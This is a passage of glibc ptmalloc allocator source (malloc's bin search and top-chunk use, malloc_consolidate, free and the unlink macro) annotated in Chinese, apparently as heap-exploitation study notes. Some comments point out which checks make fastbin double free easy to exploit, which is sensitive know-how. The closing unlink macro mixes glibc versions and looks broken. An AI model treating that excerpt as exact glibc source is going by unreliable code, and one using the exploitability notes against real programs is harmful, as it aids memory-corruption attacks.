remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

//设置被分割出去的 chunk 和 剩下的 last remainder chunk 的信息。
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

//将当前遍历的 chunk 脱链。
/* remove from unsorted list */
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);

/* Take now instead of binning if exact fit */

//2.若当前遍历的 chunk 的 size 与 nb 一致,设置物理相邻的下一个堆块的 pre_inuse 位,返回指针,结束分配。
if (size == nb)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* place chunk in bin */

//3.如果当前遍历的 chunk 属于 small bins,那就将它链入 small bins。
if (in_smallbin_range(size))
{
victim_index = smallbin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;
}
else
{
//4.如果当前遍历的 chunk 属于 large bins,那就将它链入 large bins。
victim_index = largebin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
//当 large bin 链中存在 bins 时,要将该 chunk 链入合适的位置。
//从这段源码就可以看出来一个 chunk 存在于两个双向循环链表中,一个链表包含了 large bin 中所有的 chunk,另一个链表为 chunk size 链表,该链表从每个相同大小的 chunk 的取出第一个 chunk 按照大小顺序链接在一起,便于一次跨域多个相同大小的 chunk 遍历下一个不同大小的 chunk,这样可以加快在 large bin 链表中的遍历速度。
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert((bck->bk->size & NON_MAIN_ARENA) == 0);
if ((unsigned long)(size) < (unsigned long)(bck->bk->size))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
//正向遍历 chunk size 链表,直到在链中找到第一个大小小于等于当前 chunk 大小的块。
else
{
assert((fwd->size & NON_MAIN_ARENA) == 0);
while ((unsigned long)size < fwd->size)
{
fwd = fwd->fd_nextsize;
assert((fwd->size & NON_MAIN_ARENA) == 0);
}


if ((unsigned long)size == (unsigned long)fwd->size)
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
//当 large bin 链中没有 bins 时,直接将该 chunk 入链。
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

//如果 unsorted bin 中的 chunk 超过了 10000 个,最多遍历 10000 个就退出,避免长时间处理 unsorted bin 影响内存分配的效率。
#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}



   /*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/

//如果所需分配的 chunk 为 large bin chunk,查询对应的 large bin 链表,如果 large bin 链表为空,或者链表中最大的 chunk 也不能满足要求,则不能从 large bin 中分配。否则,遍历 large bin 链表,找到合适的 chunk。
if (!in_smallbin_range(nb))
{
bin = bin_at(av, idx);

/* skip scan if empty or largest chunk is too small */
if ((victim = first(bin)) != bin &&
(unsigned long)(victim->size) >= (unsigned long)(nb))
{
victim = victim->bk_nextsize;
//反向遍历 chunk size 链表,直到找到第一个大于等于所需 chunk 大小的 chunk 退出循环。
while (((unsigned long)(size = chunksize(victim)) <
(unsigned long)(nb)))
victim = victim->bk_nextsize;

/* Avoid removing the first entry for a size so that the skip
list does not have to be rerouted. */
//如果从 large bin 链表中选取的 chunk victim 不是链表中的最后一个 chunk,并且与 victim 大小相同的chunk不止一个,那么意味着 victim 为 chunk size 链表中的节点,为了不调整 chunk size 链表,需要避免将 chunk size 链表中的节点取出,所以取 victim->fd 节点对应的 chunk 作为候选 chunk。由于 large bin 链表中的 chunk 也是按大小排序,同一大小的 chunk 有多个时,这些 chunk 必定排在一起,所以 victim->fd 节点对应的 chunk 的大小必定与 victim 的大小一样。
//这样脱链的就变成了 victim 的下一个同样大小的堆块了,减少了工作量,因为不用去修改 chunk size 链表。
if (victim != last(bin) && victim->size == victim->fd->size)
victim = victim->fd;

//计算将 victim 切分后剩余大小,并调用 unlink() 宏函数将 victim 从 large bin 链表中取出。
remainder_size = size - nb;
unlink(av, victim, bck, fwd);

//5.1.如果将 victim 切分后剩余大小小于 MINSIZE,则将整个 victim 分配出去。
/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}

//5.2.从 victim 中切分出所需的 chunk,剩余部分作为一个新的 chunk 加入到 unsorted bin 中。如果剩余部分 chunk 属于 large bins,将剩余部分 chunk 的 chunk size 链表指针设置为 NULL,因为 unsorted bin 中的 chunk 是不排序的,这两个指针无用,必须清零。
//划重点了,这里被切割了的 chunk 剩余部分会进入 unsorted bin 链中。
/* Split */
else
{
remainder = chunk_at_offset(victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}

//至此已经从 large bin 中使用最佳匹配法找到了合适的 chunk,调用 chunk2mem() 获得 chunk 中可用的内存指针,返回给应用层。
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

   /*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/

//获取下一个相邻 bin 的空闲 chunk 链表,并获取该 bin 对于 binmap 中的 bit 位的值。Binmap 中的标识了相应的 bin 中是否有空闲 chunk 存在。Binmap 按 block 管理,每个 block 为一个int,共 32 个 bit,可以表示 32 个 bin 中是否有空闲 chunk 存在。使用 binmap 可以加快查找 bin 是否包含空闲 chunk。这里只查询比所需 chunk 大的 bin 中是否有空闲 chunk 可用。
++idx;
bin = bin_at(av, idx);
block = idx2block(idx);
map = av->binmap[block];
bit = idx2bit(idx);

//遍历 binmap 的每一个 block,直到找到一个不为 0 的 block 或者遍历完所有的 block。退出循环遍历后,设置 bin 指向 block 的第一个 bit 对应的 bin,并将 bit 置为 1,表示该 block 中 bit 1 对应的 bin,就是能够取 chunk 的 bin 链,这个 bin 中如果有空闲 chunk,它的 chunk 的大小一定满足要求。
for (;;)
{
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0)
{
do
{
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
} while ((map = av->binmap[block]) == 0);

bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
}

//在一个 block 遍历对应的 bin,直到找到一个 bit 不为 0 退出遍历,则该 bit 对于的 bin 中有空闲 chunk 存在。
/* Advance to bin with set bit. There must be one. */
while ((bit & map) == 0)
{
bin = next_bin(bin);
bit <<= 1;
assert(bit != 0);
}

//将 bin 链表中的最后一个 chunk 赋值为 victim。
/* Inspect the bin. It is likely to be non-empty */
victim = last(bin);

//如果 victim 与 bin 链表头指针相同,表示该 bin 中没有空闲 chunk,binmap 中的相应位设置不准确,将 binmap 的相应 bit 位清零,获取当前 bin 下一个 bin,将 bit 移到下一个 bit 位,即乘以 2。
/* If a false alarm (empty bin), clear the bit. */
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}


//6.当前 bin 中的最后一个 chunk 满足要求,获取该 chunk 的大小,计算切分出所需 chunk 后剩余部分的大小,然后将 victim 从 bin 的链表中取出。接下来的操作跟“5”的基本差不多,有剩剩余部分会进 unsorted。
else
{
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
assert((unsigned long)(size) >= (unsigned long)(nb));

remainder_size = size - nb;

/* unlink */
unlink(av, victim, bck, fwd);

/* Exhaust */
if (remainder_size < MINSIZE)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}

/* Split */
else
{
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks 2";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

use_top:
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (have_fastchunks(av))
{
malloc_consolidate(av);
/* restore original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
else
{
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}
}

top chunk

use_top:  
/*
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (have_fastchunks (av))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}

/*
Otherwise, relay to handle system-dependent cases
*/
else
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}

malloc_consolidate

static void malloc_consolidate(mstate av)
{
mfastbinptr *fb; /* current fastbin being consolidated */
mfastbinptr *maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;
mchunkptr bck;
mchunkptr fwd;

/*
If max_fast is 0, we know that av hasn't
yet been initialized, in which case do so below
*/

//如果全局变量 global_max_fast 不为零,表示 ptmalloc 已经初始化,然后清除分配区 flag 中 fast bin 的标志位,该标志位表示分配区的 fast bins 中包含空闲 chunk,表示将要把里面的所有 chunk 都清空。
if (get_max_fast() != 0)
{
clear_fastchunks(av);

unsorted_bin = unsorted_chunks(av);

/*
Remove each chunk from fast bin and consolidate it, placing it
then in unsorted bin. Among other reasons for doing this,
placing in unsorted bin avoids needing to calculate actual bins
until malloc is sure that chunks aren't immediately going to be
reused anyway.
*/

//将分配区最大的 fast bin 链指针赋值给 maxfb,第一条 fast bin 链指针赋值给 fb,然后遍历 fast bins 的每条链。
maxfb = &fastbin(av, NFASTBINS - 1);
fb = &fastbin(av, 0);
do
{
//获取当前 bin 链的头指针赋值给 p,如果 p 不为 0,则说明当前 bin 链中存在 chunk,所有将当前 fast bin 链表的头指针赋值为 0,即删除了该 fast bin 中的空闲 chunk 链表,然后对这条链中的 chunk 进行遍历。
p = atomic_exchange_acq(fb, 0);
if (p != 0)
{
do
{
check_inuse_chunk(av, p);
nextp = p->fd;

/* Slightly streamlined version of consolidation code in free() */
size = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

//检查当前 chunk 的前一个 chunk 是否空闲,先合并,没有直接被链入 unsorted,因为还没检查物理相邻的下一个 chunk 是否空闲。
//如果当前 chunk 的前一个 chunk 空闲,则将当前 chunk 与前一个 chunk 合并成一个空闲 chunk,由于前一个 chunk 空闲,则当前 chunk 的 prev_size 保存了前一个 chunk 的大小,计算出合并后的 chunk 大小,并获取前一个 chunk 的指针,将前一个 chunk 从空闲链表中删除。
if (!prev_inuse(p))
{
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long)prevsize));
unlink(av, p, bck, fwd);
}

//如果与当前 chunk 相邻的下一个 chunk 不是分配区的 top chunk,查看与当前 chunk 相邻的下一个 chunk 是否处于 inuse 状态。
if (nextchunk != av->top)
{
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

//如果与当前 chunk 相邻的下一个 chunk 不处于 inuse 状态,,将相邻的下一个空闲 chunk 从空闲链表中删除,并计算当前 chunk 与下一个 chunk 合并后的 chunk 大小。
if (!nextinuse)
{
size += nextsize;
unlink(av, nextchunk, bck, fwd);
}
//如果与当前 chunk 相邻的下一个 chunk 处于 inuse 状态,清除当前 chunk 的 inuse 状态。
else
clear_inuse_bit_at_offset(nextchunk, 0);

//将合并后的 chunk 加入 unsorted bin 的双向循环链表中。
first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

//如果合并后的 chunk 属于 large bin,将 chunk 的 fd_nextsize 和 bk_nextsize 设置为 NULL,因为在 unsorted bin 中这两个字段无用。
//这里注意一下,特意清了数据。
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

//设置合并后的空闲 chunk 大小,并标识前一个 chunk 处于 inuse 状态,因为必须保证不能有两个相邻的 chunk 都处于空闲状态。然后将合并后的 chunk 加入 unsorted bin 的双向循环链表中。最后设置合并后的空闲 chunk 的 foot 为自身的 size,chunk 空闲时必须设置 foot,该 foot 处于下一个 chunk 的 prev_size 中,只有 chunk 空闲是 foot 才是有效的。
set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}

//如果当前 chunk 的下一个 chunk 为 top chunk,则将当前 chunk 合并入 top chunk,修改 top chunk 的大小。
else
{
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

//直到遍历完当前 bin 链中的所有空闲 chunk。
} while ((p = nextp) != 0);
}
//直到遍历完 fast bins 的每一条 bin 链。
} while (fb++ != maxfb);
}
//如果 ptmalloc 没有初始化,初始化 ptmalloc。
else
{
malloc_init_state(av);
check_malloc_state(av);
}
}

__libc_free

    void __libc_free(void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */

//如果存在 free 的 hook 函数,执行该 hook 函数返回,free 的 hook 函数主要用于创建新线程使用或使用用户提供的 free 函数。
void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL, 0))
{
(*hook)(mem, RETURN_ADDRESS(0));
return;
}

if (mem == 0) /* free(0) has no effect */
return;

//根据要释放的内存空间指针获取 chunk 指针。
p = mem2chunk(mem);

//如果当前 free 的 chunk 是通过 mmap() 分配的,调用 munmap_chunk() 函数 unmap 本 chunk。munmap_chunk() 函数调用 munmap() 函数释放 mmap() 分配的内存块。同时查看是否开启了 mmap 分配阈值动态调整机制,默认是开启的,如果当前 free 的 chunk 的大小大于设置的 mmap 分配阈值,小于 mmap 分配阈值的最大值,将当前 chunk 的大小赋值给 mmap 分配阈值,并修改 mmap 收缩阈值为 mmap 分配阈值的 2 倍。默认情况下 mmap 分配阈值与 mmap 收缩阈值相等,都为 128KB。程序返回。
if (chunk_is_mmapped(p)) /* release mmapped memory. */
{
/* see if the dynamic brk/mmap threshold needs adjusting */
if (!mp_.no_dyn_threshold && p->size > mp_.mmap_threshold && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
{
mp_.mmap_threshold = chunksize(p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk(p);
return;
}

//根据 chunk 指针获得分配区的指针,即 chunk 的管理块 arena,然后调用 _int_free() 函数执行实际的释放工作。
ar_ptr = arena_for_chunk(p);
_int_free(ar_ptr, p, 0);
}

_int_free

static void
_int_free(mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

const char *errstr = NULL;
int locked = 0;

size = chunksize(p);

//首先进行一系列的安全检查。chunk 的指针地址不能溢出,chunk 的大小必须大于等于 MINSIZE。
/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect((uintptr_t)p > (uintptr_t)-size, 0) || __builtin_expect(misaligned_chunk(p), 0))
{
errstr = "free(): invalid pointer";
errout:
if (!have_lock && locked)
(void)mutex_unlock(&av->mutex);
malloc_printerr(check_action, errstr, chunk2mem(p), av);
return;
}
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size)))
{
errstr = "free(): invalid size";
goto errout;
}

check_inuse_chunk(av, p);


/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/

//如果当前 free 的 chunk 属于 fast bins 且下一个 chunk 不是 top chunk,查看下一个相邻的 chunk 的大小是否小于等于 2*SIZE_SZ,且是否大于分配区,即检查下一个相邻 chunk 的大小有没有问题。
if ((unsigned long)(size) <= (unsigned long)(get_max_fast())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
)
{

if (__builtin_expect(chunk_at_offset(p, size)->size <= 2 * SIZE_SZ, 0) || __builtin_expect(chunksize(chunk_at_offset(p, size)) >= av->system_mem, 0))
{
/* We might not have a lock at this point and concurrent modifications
of system_mem might have let to a false positive. Redo the test
after getting the lock. */
if (have_lock || ({
assert(locked == 0);
mutex_lock(&av->mutex);
locked = 1;
chunk_at_offset(p, size)->size <= 2 * SIZE_SZ || chunksize(chunk_at_offset(p, size)) >= av->system_mem;
}))
{
errstr = "free(): invalid next size (fast)";
goto errout;
}
if (!have_lock)
{
(void)mutex_unlock(&av->mutex);
locked = 0;
}
}

//设置当前分配区的 fast bin flag,表示当前分配区的 fast bins 中已有空闲 chunk。然后根据当前 free 的 chunk 大小获取其所属的 fast bin 头指针。
free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);

set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin(av, idx);

//检查 double free 的,即检查 fast bin 链头的 chunk 和要释放的 chunk 是否一致。
/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u;
do
{
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect(old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
//检查顶部 fastbin 块的大小是否与我们要添加的块的大小相同。
/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
deallocated. See use of OLD_IDX below for the actual check. */
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
p->fd = old2 = old;
} while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

if (have_lock && old != NULL && __builtin_expect(old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}


/*
Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p))
{
//当前还没有获得分配区的锁,获取分配区的锁。
if (!have_lock)
{
(void)mutex_lock(&av->mutex);
locked = 1;
}

//获取当前 free 的 chunk 的下一个相邻的 chunk。
nextchunk = chunk_at_offset(p, size);

//进行安全检查,当前 free 的 chunk 不能为 top chunk,因为 top chunk 为空闲 chunk,如果再次 free 就可能为 double free 错误了。
/* Lightweight tests: check whether the block is already the
top block. */
if (__glibc_unlikely(p == av->top))
{
errstr = "double free or corruption (top)";
goto errout;
}
//如果当前 free 的 chunk 是通过 sbrk() 分配的,并且下一个相邻的 chunk 的地址已经超过了 top chunk 的结束地址,即超过了当前分配区的结束地址,报错。
/* Or whether the next chunk is beyond the boundaries of the arena. */
if (__builtin_expect(contiguous(av) && (char *)nextchunk >= ((char *)av->top + chunksize(av->top)), 0))
{
errstr = "double free or corruption (out)";
goto errout;
}

//如果当前 free 的 chunk 的下一个相邻 chunk 的 size 中标志位没有标识当前 free chunk 为 inuse 状态,可能为 double free 错误。
//这就是为什么 fast bin 的 double free 这么容易利用,因为 chunk 被链入 fast bin 是不会将下一个 chunk 的 pre_inuse 位置 0 的。
/* Or whether the block is actually not marked used. */
if (__glibc_unlikely(!prev_inuse(nextchunk)))
{
errstr = "double free or corruption (!prev)";
goto errout;
}

//计算当前 free 的 chunk 的下一个相邻 chunk 的大小,该大小如果小于等于 2*SIZE_SZ 或是大于了分配区所分配区的内存总量,报错。
nextsize = chunksize(nextchunk);
if (__builtin_expect(nextchunk->size <= 2 * SIZE_SZ, 0) || __builtin_expect(nextsize >= av->system_mem, 0))
{
errstr = "free(): invalid next size (normal)";
goto errout;
}

free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);

   /* consolidate backward */
//如果当前 free 的 chunk 的前一个相邻 chunk 为空闲状态,与前一个空闲 chunk 合并。计算合并后的 chunk 大小,并将前一个相邻空闲 chunk 从空闲 chunk 链表中删除。
if (!prev_inuse(p))
{
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long)prevsize));
unlink(av, p, bck, fwd);
}

//如果与当前 free 的 chunk 相邻的下一个 chunk 不是分配区的 top chunk,查看与当前 chunk 相邻的下一个 chunk 是否处于 inuse 状态。如果与当前 free 的 chunk 相邻的下一个 chunk 处于 inuse 状态,清除当前 chunk 的 inuse 状态,则当前 chunk 空闲了。
//否则,将相邻的下一个空闲 chunk 从空闲链表中删除,并计算当前 chunk 与下一个 chunk 合并后的 chunk 大小。
if (nextchunk != av->top)
{
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

/* consolidate forward */
if (!nextinuse)
{
unlink(av, nextchunk, bck, fwd);
size += nextsize;
}
else
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
//将合并后的 chunk 加入 unsorted bin 的双向循环链表中。如果合并后的 chunk 属于 large bins,将 chunk 的 fd_nextsize 和 bk_nextsize 设置为 NULL,因为在 unsorted bin 中这两个字段无用。

bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "free(): corrupted unsorted chunks";
goto errout;
}
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

//设置合并后的空闲 chunk 大小,并标识前一个 chunk 处于 inuse 状态,因为必须保证不能有两个相邻的 chunk 都处于空闲状态。然后将合并后的 chunk 加入 unsorted bin 的双向循环链表中。最后设置合并后的空闲 chunk 的 foot,chunk 空闲时必须设置 foot,该 foot 处于下一个 chunk 的 prev_size 中,只有 chunk 空闲是 foot 才是有效的。
set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);
}

/*
If the chunk borders the current high end of memory,
consolidate into top
*/

//如果当前 free 的 chunk 下一个相邻的 chunk 为 top chunk,则将当前 chunk 合并入 top chunk,修改 top chunk 的大小。
else
{
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}

    /*
If freeing a large space, consolidate possibly-surrounding
chunks. Then, if the total unused topmost memory exceeds trim
threshold, ask malloc_trim to reduce top.

Unless max_fast is 0, we don't know if there are fastbins
bordering top, so we cannot tell for sure whether threshold
has been reached unless fastbins are consolidated. But we
don't want to consolidate on each free. As a compromise,
consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
is reached.
*/

//如果合并后的 chunk 大小大于 64KB(0x10000),并且 fast bins 中存在空闲 chunk,调用 malloc_consolidate() 函数合并 fast bins 中的空闲 chunk 到 unsorted bin 中。
//这里也很重要,就是判断得到的 unsorted bin size 是否大于 FASTBIN_CONSOLIDATION_THRESHOLD,就会触发 malloc_consolidate。
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD)
{
if (have_fastchunks(av))
malloc_consolidate(av);

//如果当前分配区为主分配区,并且 top chunk 的大小大于 heap 的收缩阈值,调用 systrim() 函数收缩 heap。
if (av == &main_arena)
{
#ifndef MORECORE_CANNOT_TRIM
if ((unsigned long)(chunksize(av->top)) >=
(unsigned long)(mp_.trim_threshold))
systrim(mp_.top_pad, av);
#endif
}
//如果为非主分配区,调用 heap_trim()函数收缩非主分配区的 sub_heap。
else
{
/* Always try heap_trim(), even if the top chunk is not
large, because the corresponding heap might go away. */
heap_info *heap = heap_for_ptr(top(av));

assert(heap->ar_ptr == av);
heap_trim(heap, mp_.top_pad);
}
}

//如果获得了分配区的锁,则对分配区解锁。
if (!have_lock)
{
assert(locked);
(void)mutex_unlock(&av->mutex);
}
}

  /*
If the chunk was allocated via mmap, release via munmap().
*/
//如果当前 free 的 chunk 是通过 mmap()分配的,调用 munma_chunk()释放内存。
else
{
munmap_chunk(p);
}
}

/* Take a chunk off a bin list */ 
// unlink p
define unlink(AV, P, BK, FD) { \
// 由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致。
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
malloc_printerr ("corrupted size vs. prev_size"); \
FD = P->fd; \
BK = P->bk; \
// 防止攻击者简单篡改空闲的 chunk 的 fd 与 bk 来实现任意写的效果。
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
else { \
FD->bk = BK; \
BK->fd = FD; \
// 下面主要考虑 P 对应的 nextsize 双向链表的修改
if (!in_smallbin_range (chunksize_nomask (P)) \
// 如果P->fd_nextsize为 NULL,表明 P 未插入到 nextsize 链表中。
// 那么其实也就没有必要对 nextsize 字段进行修改了。
// 这里没有去判断 bk_nextsize 字段,可能会出问题。
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
// 类似于小的 chunk 的检查思路
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
malloc_printerr (check_action, \
"corrupted double-linked list (not small)", \
P, AV); \
// 这里说明 P 已经在 nextsize 链表中了。
// 如果 FD 没有在 nextsize 链表中
if (FD->fd_nextsize == NULL) { \
// 如果 nextsize 串起来的双链表只有 P 本身,那就直接拿走 P
// 令 FD 为 nextsize 串起来的
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
// 否则我们需要将 FD 插入到 nextsize 形成的双链表中
FD->fd_nextsize = P->fd_nextsize; \
